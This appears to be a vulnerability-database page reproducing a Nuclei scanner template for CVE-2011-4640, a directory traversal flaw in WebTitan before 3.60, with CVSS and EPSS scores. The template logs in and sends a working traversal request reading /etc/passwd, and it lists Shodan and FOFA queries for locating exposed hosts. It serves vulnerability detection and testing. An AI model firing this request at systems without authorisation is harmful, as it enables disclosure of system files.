Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2011-4640
HistoryOct 06, 2023 - 6:06 a.m.

WebTitan < 3.60 - Local File Inclusion

2023-10-0606:06:38
ProjectDiscovery
github.com
3
cve2011
lfi
spamtitan
webtitan
authenticated
directory
traversal
logs-x.php

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

6.2 Medium

AI Score

Confidence

Low

0.046 Low

EPSS

Percentile

92.6%

Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.
id: CVE-2011-4640

info:
  name: WebTitan < 3.60 - Local File Inclusion
  author: ctflearner
  severity: medium
  description: |
    Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.
  reference:
    - https://www.exploit-db.com/exploits/37943
    - https://nvd.nist.gov/vuln/detail/CVE-2011-4640
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N
    cvss-score: 4
    cve-id: CVE-2011-4640
    cwe-id: CWE-22
    epss-score: 0.05544
    epss-percentile: 0.93225
    cpe: cpe:2.3:a:spamtitan:webtitan:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: spamtitan
    product: webtitan
    shodan-query:
      - title:"WebTitan"
      - http.favicon.hash:1090061843
    fofa-query:
      - icon_hash=1090061843
      - title="webtitan"
  tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated

http:
  - raw:
      - |
        GET /login-x.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /login-x.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        jaction=login&language=en_US&username={{username}}&password={{password}}

      - |
        GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "success\":true")'
          - 'contains(body_1, "WebTitan")'
          - "regex('root:.*:0:0:', body)"
          - 'status_code_3 == 200'
        condition: and
# digest: 490a0046304402201eaffb982a68a851824728b221e93502cf81c0c339a5a281c5f9c00641db37d8022041a162a42e24f9fa8ecd4855c69a7ad4ce469e2c9264b97710267fdddb0ecaf2:922c64590222798bb761d5b6d8e72950

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

6.2 Medium

AI Score

Confidence

Low

0.046 Low

EPSS

Percentile

92.6%

Related for NUCLEI:CVE-2011-4640